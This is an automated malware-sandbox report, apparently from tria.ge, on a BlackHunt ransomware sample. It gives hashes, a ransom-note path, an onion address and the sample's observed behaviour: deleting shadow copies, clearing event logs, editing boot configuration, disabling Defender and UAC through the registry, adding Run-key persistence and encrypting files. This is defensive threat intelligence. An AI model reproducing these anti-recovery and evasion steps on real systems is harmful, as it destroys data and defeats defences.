Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
120s -
max time network
127s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
19/01/2024, 00:16
Static task
static1
Behavioral task
behavioral1
Sample
995a700ff7f531d832a81855e08354c9077f4fa4aa104345af8666c284f27e08.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
995a700ff7f531d832a81855e08354c9077f4fa4aa104345af8666c284f27e08.exe
Resource
win10v2004-20231215-en
General
-
Target
995a700ff7f531d832a81855e08354c9077f4fa4aa104345af8666c284f27e08.exe
-
Size
707KB
-
MD5
49b04ddad7c5bf6faaa310cadddf237d
-
SHA1
37f9d7c51d324b1fec2fe6d414ffddff4ac7c9aa
-
SHA256
995a700ff7f531d832a81855e08354c9077f4fa4aa104345af8666c284f27e08
-
SHA512
f49ae359f9f24192e248fb0ef64a0a15e5e9484baeec85beb9103cb4a03f7da8fc9f465eb29de2da20857680577153fed784b56efaca8115cd992257ba7afff5
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1Z8Uvnh:6uaTmkZJ+naie5OTamgEoKxLWEqh
Malware Config
Extracted
C:\ProgramData\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 2 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 2252 fsutil.exe 2592 fsutil.exe -
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection vssadmin.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" vssadmin.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 995a700ff7f531d832a81855e08354c9077f4fa4aa104345af8666c284f27e08.exe -
Clears Windows event logs 1 TTPs 5 IoCs
pid Process 3028 wevtutil.exe 2560 wevtutil.exe 1756 wevtutil.exe 4060 wevtutil.exe 2280 wevtutil.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
pid Process 2800 bcdedit.exe 1204 bcdedit.exe 3348 bcdedit.exe 1984 bcdedit.exe -
Renames multiple (2847) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 2608 wbadmin.exe 2236 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Deletes itself 1 IoCs
pid Process 2036 cmd.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" bcdedit.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 995a700ff7f531d832a81855e08354c9077f4fa4aa104345af8666c284f27e08.exe -
Enumerates connected drives 3 TTPs 27 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\R: 995a700ff7f531d832a81855e08354c9077f4fa4aa104345af8666c284f27e08.exe File opened (read-only) \??\Y: 995a700ff7f531d832a81855e08354c9077f4fa4aa104345af8666c284f27e08.exe File opened (read-only) \??\H: 995a700ff7f531d832a81855e08354c9077f4fa4aa104345af8666c284f27e08.exe File opened (read-only) \??\K: 995a700ff7f531d832a81855e08354c9077f4fa4aa104345af8666c284f27e08.exe File opened (read-only) \??\N: 995a700ff7f531d832a81855e08354c9077f4fa4aa104345af8666c284f27e08.exe File opened (read-only) \??\J: 995a700ff7f531d832a81855e08354c9077f4fa4aa104345af8666c284f27e08.exe File opened (read-only) \??\L: 995a700ff7f531d832a81855e08354c9077f4fa4aa104345af8666c284f27e08.exe File opened (read-only) \??\Z: 995a700ff7f531d832a81855e08354c9077f4fa4aa104345af8666c284f27e08.exe File opened (read-only) \??\B: 995a700ff7f531d832a81855e08354c9077f4fa4aa104345af8666c284f27e08.exe File opened (read-only) \??\M: 995a700ff7f531d832a81855e08354c9077f4fa4aa104345af8666c284f27e08.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\F: wbadmin.exe File opened (read-only) \??\W: 995a700ff7f531d832a81855e08354c9077f4fa4aa104345af8666c284f27e08.exe File opened (read-only) \??\T: 995a700ff7f531d832a81855e08354c9077f4fa4aa104345af8666c284f27e08.exe File opened (read-only) \??\G: 995a700ff7f531d832a81855e08354c9077f4fa4aa104345af8666c284f27e08.exe File opened (read-only) \??\V: 995a700ff7f531d832a81855e08354c9077f4fa4aa104345af8666c284f27e08.exe File opened (read-only) \??\X: 995a700ff7f531d832a81855e08354c9077f4fa4aa104345af8666c284f27e08.exe File opened (read-only) \??\U: 995a700ff7f531d832a81855e08354c9077f4fa4aa104345af8666c284f27e08.exe File opened (read-only) \??\I: 995a700ff7f531d832a81855e08354c9077f4fa4aa104345af8666c284f27e08.exe File opened (read-only) \??\P: 995a700ff7f531d832a81855e08354c9077f4fa4aa104345af8666c284f27e08.exe File opened (read-only) \??\S: 995a700ff7f531d832a81855e08354c9077f4fa4aa104345af8666c284f27e08.exe File opened (read-only) \??\M: fsutil.exe File opened (read-only) \??\E: 995a700ff7f531d832a81855e08354c9077f4fa4aa104345af8666c284f27e08.exe File opened (read-only) \??\O: 995a700ff7f531d832a81855e08354c9077f4fa4aa104345af8666c284f27e08.exe File opened (read-only) \??\A: 995a700ff7f531d832a81855e08354c9077f4fa4aa104345af8666c284f27e08.exe File opened (read-only) \??\Q: 995a700ff7f531d832a81855e08354c9077f4fa4aa104345af8666c284f27e08.exe File opened (read-only) \??\F: fsutil.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 2 ip-api.com -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\#BlackHunt_BG.jpg" 995a700ff7f531d832a81855e08354c9077f4fa4aa104345af8666c284f27e08.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\win7Handle.png 995a700ff7f531d832a81855e08354c9077f4fa4aa104345af8666c284f27e08.exe File created C:\Program Files\VideoLAN\VLC\locale\ko\#BlackHunt_Private.key 995a700ff7f531d832a81855e08354c9077f4fa4aa104345af8666c284f27e08.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Ust-Nera 995a700ff7f531d832a81855e08354c9077f4fa4aa104345af8666c284f27e08.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\lib\#BlackHunt_ReadMe.txt 995a700ff7f531d832a81855e08354c9077f4fa4aa104345af8666c284f27e08.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\modules\dkjson.luac 995a700ff7f531d832a81855e08354c9077f4fa4aa104345af8666c284f27e08.exe File created C:\Program Files (x86)\Uninstall Information\#BlackHunt_ReadMe.hta 995a700ff7f531d832a81855e08354c9077f4fa4aa104345af8666c284f27e08.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Postage_ButtonGraphic.png 995a700ff7f531d832a81855e08354c9077f4fa4aa104345af8666c284f27e08.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\#BlackHunt_ReadMe.hta 995a700ff7f531d832a81855e08354c9077f4fa4aa104345af8666c284f27e08.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler-api.xml 995a700ff7f531d832a81855e08354c9077f4fa4aa104345af8666c284f27e08.exe File created C:\Program Files\VideoLAN\VLC\locale\#BlackHunt_ReadMe.txt 995a700ff7f531d832a81855e08354c9077f4fa4aa104345af8666c284f27e08.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Argentina\Rio_Gallegos 995a700ff7f531d832a81855e08354c9077f4fa4aa104345af8666c284f27e08.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Los_Angeles 995a700ff7f531d832a81855e08354c9077f4fa4aa104345af8666c284f27e08.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\babypink.png 995a700ff7f531d832a81855e08354c9077f4fa4aa104345af8666c284f27e08.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Kentucky\#BlackHunt_ReadMe.hta 995a700ff7f531d832a81855e08354c9077f4fa4aa104345af8666c284f27e08.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.osgi.services.nl_zh_4.4.0.v20140623020002.jar 995a700ff7f531d832a81855e08354c9077f4fa4aa104345af8666c284f27e08.exe File created C:\Program Files\VideoLAN\VLC\plugins\audio_filter\#BlackHunt_ReadMe.txt 995a700ff7f531d832a81855e08354c9077f4fa4aa104345af8666c284f27e08.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\#BlackHunt_Private.key 995a700ff7f531d832a81855e08354c9077f4fa4aa104345af8666c284f27e08.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.browser.ja_5.5.0.165303.jar 995a700ff7f531d832a81855e08354c9077f4fa4aa104345af8666c284f27e08.exe File created C:\Program Files\VideoLAN\VLC\locale\lv\#BlackHunt_Private.key 995a700ff7f531d832a81855e08354c9077f4fa4aa104345af8666c284f27e08.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\win32\jni_md.h 995a700ff7f531d832a81855e08354c9077f4fa4aa104345af8666c284f27e08.exe File created C:\Program Files\VideoLAN\VLC\hrtfs\#BlackHunt_ReadMe.txt 995a700ff7f531d832a81855e08354c9077f4fa4aa104345af8666c284f27e08.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\feature.xml 995a700ff7f531d832a81855e08354c9077f4fa4aa104345af8666c284f27e08.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-api-annotations-common.xml 995a700ff7f531d832a81855e08354c9077f4fa4aa104345af8666c284f27e08.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-core-io-ui.xml 995a700ff7f531d832a81855e08354c9077f4fa4aa104345af8666c284f27e08.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Setup Files\{AC76BA86-7AD7-1033-7B44-A90000000001}\setup.ini 995a700ff7f531d832a81855e08354c9077f4fa4aa104345af8666c284f27e08.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\play-static.png 995a700ff7f531d832a81855e08354c9077f4fa4aa104345af8666c284f27e08.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\#BlackHunt_Private.key 995a700ff7f531d832a81855e08354c9077f4fa4aa104345af8666c284f27e08.exe File created C:\Program Files\VideoLAN\VLC\locale\bn_IN\LC_MESSAGES\#BlackHunt_ReadMe.txt 995a700ff7f531d832a81855e08354c9077f4fa4aa104345af8666c284f27e08.exe File created C:\Program Files\VideoLAN\VLC\plugins\gui\#BlackHunt_Private.key 995a700ff7f531d832a81855e08354c9077f4fa4aa104345af8666c284f27e08.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\HueCycle\#BlackHunt_Private.key 995a700ff7f531d832a81855e08354c9077f4fa4aa104345af8666c284f27e08.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\ResizingPanels\blackbars80.png 995a700ff7f531d832a81855e08354c9077f4fa4aa104345af8666c284f27e08.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.diagnostic.zh_CN_5.5.0.165303.jar 995a700ff7f531d832a81855e08354c9077f4fa4aa104345af8666c284f27e08.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.jdp_5.5.0.165303.jar 995a700ff7f531d832a81855e08354c9077f4fa4aa104345af8666c284f27e08.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-core-execution.xml 995a700ff7f531d832a81855e08354c9077f4fa4aa104345af8666c284f27e08.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-options-keymap.xml 995a700ff7f531d832a81855e08354c9077f4fa4aa104345af8666c284f27e08.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Antarctica\Casey 995a700ff7f531d832a81855e08354c9077f4fa4aa104345af8666c284f27e08.exe File created C:\Program Files\VideoLAN\VLC\locale\mk\LC_MESSAGES\#BlackHunt_ReadMe.txt 995a700ff7f531d832a81855e08354c9077f4fa4aa104345af8666c284f27e08.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\North_Dakota\#BlackHunt_ReadMe.txt 995a700ff7f531d832a81855e08354c9077f4fa4aa104345af8666c284f27e08.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Notes_INTRO_BG_PAL.wmv 995a700ff7f531d832a81855e08354c9077f4fa4aa104345af8666c284f27e08.exe File created C:\Program Files\VideoLAN\VLC\lua\playlist\#BlackHunt_ReadMe.hta 995a700ff7f531d832a81855e08354c9077f4fa4aa104345af8666c284f27e08.exe File created C:\Program Files\VideoLAN\VLC\locale\ia\#BlackHunt_ReadMe.txt 995a700ff7f531d832a81855e08354c9077f4fa4aa104345af8666c284f27e08.exe File created C:\Program Files (x86)\Google\Update\Download\#BlackHunt_ReadMe.txt 995a700ff7f531d832a81855e08354c9077f4fa4aa104345af8666c284f27e08.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Indian\Cocos 995a700ff7f531d832a81855e08354c9077f4fa4aa104345af8666c284f27e08.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\images\buttons.png 995a700ff7f531d832a81855e08354c9077f4fa4aa104345af8666c284f27e08.exe File opened for modification C:\Program Files\7-Zip\Lang\da.txt 995a700ff7f531d832a81855e08354c9077f4fa4aa104345af8666c284f27e08.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-modules-profiler-attach.jar 995a700ff7f531d832a81855e08354c9077f4fa4aa104345af8666c284f27e08.exe File created C:\Program Files\VideoLAN\VLC\locale\pa\LC_MESSAGES\#BlackHunt_ReadMe.hta 995a700ff7f531d832a81855e08354c9077f4fa4aa104345af8666c284f27e08.exe File created C:\Program Files\VideoLAN\VLC\locale\pl\LC_MESSAGES\#BlackHunt_Private.key 995a700ff7f531d832a81855e08354c9077f4fa4aa104345af8666c284f27e08.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\rollinghills.png 995a700ff7f531d832a81855e08354c9077f4fa4aa104345af8666c284f27e08.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder.controlpanel.ui.zh_CN_5.5.0.165303.jar 995a700ff7f531d832a81855e08354c9077f4fa4aa104345af8666c284f27e08.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\passport_mask_right.png 995a700ff7f531d832a81855e08354c9077f4fa4aa104345af8666c284f27e08.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT-4 995a700ff7f531d832a81855e08354c9077f4fa4aa104345af8666c284f27e08.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Indiana\Tell_City 995a700ff7f531d832a81855e08354c9077f4fa4aa104345af8666c284f27e08.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\#BlackHunt_ReadMe.txt 995a700ff7f531d832a81855e08354c9077f4fa4aa104345af8666c284f27e08.exe File opened for modification C:\Program Files\Java\jre7\lib\cmm\LINEAR_RGB.pf 995a700ff7f531d832a81855e08354c9077f4fa4aa104345af8666c284f27e08.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\bin\plugin2\#BlackHunt_ReadMe.txt 995a700ff7f531d832a81855e08354c9077f4fa4aa104345af8666c284f27e08.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\#BlackHunt_Private.key 995a700ff7f531d832a81855e08354c9077f4fa4aa104345af8666c284f27e08.exe File created C:\Program Files\VideoLAN\VLC\locale\zh_TW\#BlackHunt_Private.key 995a700ff7f531d832a81855e08354c9077f4fa4aa104345af8666c284f27e08.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyMainBackground.wmv 995a700ff7f531d832a81855e08354c9077f4fa4aa104345af8666c284f27e08.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\HueCycle\15x15dot.png 995a700ff7f531d832a81855e08354c9077f4fa4aa104345af8666c284f27e08.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.databinding.beans_1.2.200.v20140214-0004.jar 995a700ff7f531d832a81855e08354c9077f4fa4aa104345af8666c284f27e08.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Minsk 995a700ff7f531d832a81855e08354c9077f4fa4aa104345af8666c284f27e08.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\#BlackHunt_Private.key 995a700ff7f531d832a81855e08354c9077f4fa4aa104345af8666c284f27e08.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\#BlackHunt_ReadMe.txt 995a700ff7f531d832a81855e08354c9077f4fa4aa104345af8666c284f27e08.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2632 schtasks.exe -
Interacts with shadow copies 2 TTPs 6 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 864 vssadmin.exe 2744 vssadmin.exe 2236 vssadmin.exe 2904 vssadmin.exe 2300 vssadmin.exe 2540 vssadmin.exe -
Kills process with taskkill 1 IoCs
pid Process 1596 taskkill.exe -
Modifies registry class 10 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2 reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 reg.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 3868 PING.EXE -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 4000 mshta.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeDebugPrivilege 2508 995a700ff7f531d832a81855e08354c9077f4fa4aa104345af8666c284f27e08.exe Token: SeRestorePrivilege 2508 995a700ff7f531d832a81855e08354c9077f4fa4aa104345af8666c284f27e08.exe Token: SeBackupPrivilege 2508 995a700ff7f531d832a81855e08354c9077f4fa4aa104345af8666c284f27e08.exe Token: SeTakeOwnershipPrivilege 2508 995a700ff7f531d832a81855e08354c9077f4fa4aa104345af8666c284f27e08.exe Token: SeAuditPrivilege 2508 995a700ff7f531d832a81855e08354c9077f4fa4aa104345af8666c284f27e08.exe Token: SeSecurityPrivilege 2508 995a700ff7f531d832a81855e08354c9077f4fa4aa104345af8666c284f27e08.exe Token: SeIncBasePriorityPrivilege 2508 995a700ff7f531d832a81855e08354c9077f4fa4aa104345af8666c284f27e08.exe Token: SeBackupPrivilege 2140 vssvc.exe Token: SeRestorePrivilege 2140 vssvc.exe Token: SeAuditPrivilege 2140 vssvc.exe Token: SeBackupPrivilege 3112 wbengine.exe Token: SeRestorePrivilege 3112 wbengine.exe Token: SeSecurityPrivilege 3112 wbengine.exe Token: SeSecurityPrivilege 2560 wevtutil.exe Token: SeBackupPrivilege 2560 wevtutil.exe Token: SeSecurityPrivilege 1756 wevtutil.exe Token: SeBackupPrivilege 1756 wevtutil.exe Token: SeSecurityPrivilege 2280 wevtutil.exe Token: SeBackupPrivilege 2280 wevtutil.exe Token: SeSecurityPrivilege 3028 wevtutil.exe Token: SeBackupPrivilege 3028 wevtutil.exe Token: SeSecurityPrivilege 4060 wevtutil.exe Token: SeBackupPrivilege 4060 wevtutil.exe Token: SeDebugPrivilege 1596 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2508 wrote to memory of 2696 2508 995a700ff7f531d832a81855e08354c9077f4fa4aa104345af8666c284f27e08.exe 30 PID 2508 wrote to memory of 2696 2508 995a700ff7f531d832a81855e08354c9077f4fa4aa104345af8666c284f27e08.exe 30 PID 2508 wrote to memory of 2696 2508 995a700ff7f531d832a81855e08354c9077f4fa4aa104345af8666c284f27e08.exe 30 PID 2508 wrote to memory of 2696 2508 995a700ff7f531d832a81855e08354c9077f4fa4aa104345af8666c284f27e08.exe 30 PID 2508 wrote to memory of 2772 2508 995a700ff7f531d832a81855e08354c9077f4fa4aa104345af8666c284f27e08.exe 150 PID 2508 wrote to memory of 2772 2508 995a700ff7f531d832a81855e08354c9077f4fa4aa104345af8666c284f27e08.exe 150 PID 2508 wrote to memory of 2772 2508 995a700ff7f531d832a81855e08354c9077f4fa4aa104345af8666c284f27e08.exe 150 PID 2508 wrote to memory of 2772 2508 995a700ff7f531d832a81855e08354c9077f4fa4aa104345af8666c284f27e08.exe 150 PID 2696 wrote to memory of 2952 2696 cmd.exe 190 PID 2696 wrote to memory of 2952 2696 cmd.exe 190 PID 2696 wrote to memory of 2952 2696 cmd.exe 190 PID 2508 wrote to memory of 2724 2508 995a700ff7f531d832a81855e08354c9077f4fa4aa104345af8666c284f27e08.exe 204 PID 2508 wrote to memory of 2724 2508 995a700ff7f531d832a81855e08354c9077f4fa4aa104345af8666c284f27e08.exe 204 PID 2508 wrote to memory of 2724 2508 995a700ff7f531d832a81855e08354c9077f4fa4aa104345af8666c284f27e08.exe 204 PID 2508 wrote to memory of 2724 2508 995a700ff7f531d832a81855e08354c9077f4fa4aa104345af8666c284f27e08.exe 204 PID 2508 wrote to memory of 2572 2508 995a700ff7f531d832a81855e08354c9077f4fa4aa104345af8666c284f27e08.exe 213 PID 2508 wrote to memory of 2572 2508 995a700ff7f531d832a81855e08354c9077f4fa4aa104345af8666c284f27e08.exe 213 PID 2508 wrote to memory of 2572 2508 995a700ff7f531d832a81855e08354c9077f4fa4aa104345af8666c284f27e08.exe 213 PID 2508 wrote to memory of 2572 2508 995a700ff7f531d832a81855e08354c9077f4fa4aa104345af8666c284f27e08.exe 213 PID 2772 wrote to memory of 2700 2772 cmd.exe 143 PID 2772 wrote to memory of 2700 2772 cmd.exe 143 PID 2772 wrote to memory of 2700 2772 cmd.exe 143 PID 2508 wrote to memory of 2684 2508 995a700ff7f531d832a81855e08354c9077f4fa4aa104345af8666c284f27e08.exe 140 PID 2508 wrote to memory of 2684 2508 995a700ff7f531d832a81855e08354c9077f4fa4aa104345af8666c284f27e08.exe 140 PID 2508 wrote to memory of 2684 2508 995a700ff7f531d832a81855e08354c9077f4fa4aa104345af8666c284f27e08.exe 140 PID 2508 wrote to memory of 2684 2508 995a700ff7f531d832a81855e08354c9077f4fa4aa104345af8666c284f27e08.exe 140 PID 2508 wrote to memory of 2600 2508 995a700ff7f531d832a81855e08354c9077f4fa4aa104345af8666c284f27e08.exe 139 PID 2508 wrote to memory of 2600 2508 995a700ff7f531d832a81855e08354c9077f4fa4aa104345af8666c284f27e08.exe 139 PID 2508 wrote to memory of 2600 2508 995a700ff7f531d832a81855e08354c9077f4fa4aa104345af8666c284f27e08.exe 139 PID 2508 wrote to memory of 2600 2508 995a700ff7f531d832a81855e08354c9077f4fa4aa104345af8666c284f27e08.exe 139 PID 2724 wrote to memory of 2900 2724 conhost.exe 137 PID 2724 wrote to memory of 2900 2724 conhost.exe 137 PID 2724 wrote to memory of 2900 2724 conhost.exe 137 PID 2508 wrote to memory of 2592 2508 995a700ff7f531d832a81855e08354c9077f4fa4aa104345af8666c284f27e08.exe 200 PID 2508 wrote to memory of 2592 2508 995a700ff7f531d832a81855e08354c9077f4fa4aa104345af8666c284f27e08.exe 200 PID 2508 wrote to memory of 2592 2508 995a700ff7f531d832a81855e08354c9077f4fa4aa104345af8666c284f27e08.exe 200 PID 2508 wrote to memory of 2592 2508 995a700ff7f531d832a81855e08354c9077f4fa4aa104345af8666c284f27e08.exe 200 PID 2508 wrote to memory of 2828 2508 995a700ff7f531d832a81855e08354c9077f4fa4aa104345af8666c284f27e08.exe 136 PID 2508 wrote to memory of 2828 2508 995a700ff7f531d832a81855e08354c9077f4fa4aa104345af8666c284f27e08.exe 136 PID 2508 wrote to memory of 2828 2508 995a700ff7f531d832a81855e08354c9077f4fa4aa104345af8666c284f27e08.exe 136 PID 2508 wrote to memory of 2828 2508 995a700ff7f531d832a81855e08354c9077f4fa4aa104345af8666c284f27e08.exe 136 PID 2508 wrote to memory of 2176 2508 995a700ff7f531d832a81855e08354c9077f4fa4aa104345af8666c284f27e08.exe 135 PID 2508 wrote to memory of 2176 2508 995a700ff7f531d832a81855e08354c9077f4fa4aa104345af8666c284f27e08.exe 135 PID 2508 wrote to memory of 2176 2508 995a700ff7f531d832a81855e08354c9077f4fa4aa104345af8666c284f27e08.exe 135 PID 2508 wrote to memory of 2176 2508 995a700ff7f531d832a81855e08354c9077f4fa4aa104345af8666c284f27e08.exe 135 PID 2572 wrote to memory of 2780 2572 conhost.exe 134 PID 2572 wrote to memory of 2780 2572 conhost.exe 134 PID 2572 wrote to memory of 2780 2572 conhost.exe 134 PID 2508 wrote to memory of 2556 2508 995a700ff7f531d832a81855e08354c9077f4fa4aa104345af8666c284f27e08.exe 120 PID 2508 wrote to memory of 2556 2508 995a700ff7f531d832a81855e08354c9077f4fa4aa104345af8666c284f27e08.exe 120 PID 2508 wrote to memory of 2556 2508 995a700ff7f531d832a81855e08354c9077f4fa4aa104345af8666c284f27e08.exe 120 PID 2508 wrote to memory of 2556 2508 995a700ff7f531d832a81855e08354c9077f4fa4aa104345af8666c284f27e08.exe 120 PID 2508 wrote to memory of 2624 2508 995a700ff7f531d832a81855e08354c9077f4fa4aa104345af8666c284f27e08.exe 114 PID 2508 wrote to memory of 2624 2508 995a700ff7f531d832a81855e08354c9077f4fa4aa104345af8666c284f27e08.exe 114 PID 2508 wrote to memory of 2624 2508 995a700ff7f531d832a81855e08354c9077f4fa4aa104345af8666c284f27e08.exe 114 PID 2508 wrote to memory of 2624 2508 995a700ff7f531d832a81855e08354c9077f4fa4aa104345af8666c284f27e08.exe 114 PID 2508 wrote to memory of 2640 2508 995a700ff7f531d832a81855e08354c9077f4fa4aa104345af8666c284f27e08.exe 171 PID 2508 wrote to memory of 2640 2508 995a700ff7f531d832a81855e08354c9077f4fa4aa104345af8666c284f27e08.exe 171 PID 2508 wrote to memory of 2640 2508 995a700ff7f531d832a81855e08354c9077f4fa4aa104345af8666c284f27e08.exe 171 PID 2508 wrote to memory of 2640 2508 995a700ff7f531d832a81855e08354c9077f4fa4aa104345af8666c284f27e08.exe 171 PID 2508 wrote to memory of 3016 2508 995a700ff7f531d832a81855e08354c9077f4fa4aa104345af8666c284f27e08.exe 47 PID 2508 wrote to memory of 3016 2508 995a700ff7f531d832a81855e08354c9077f4fa4aa104345af8666c284f27e08.exe 47 PID 2508 wrote to memory of 3016 2508 995a700ff7f531d832a81855e08354c9077f4fa4aa104345af8666c284f27e08.exe 47 PID 2508 wrote to memory of 3016 2508 995a700ff7f531d832a81855e08354c9077f4fa4aa104345af8666c284f27e08.exe 47 -
System policy modification 1 TTPs 3 IoCs
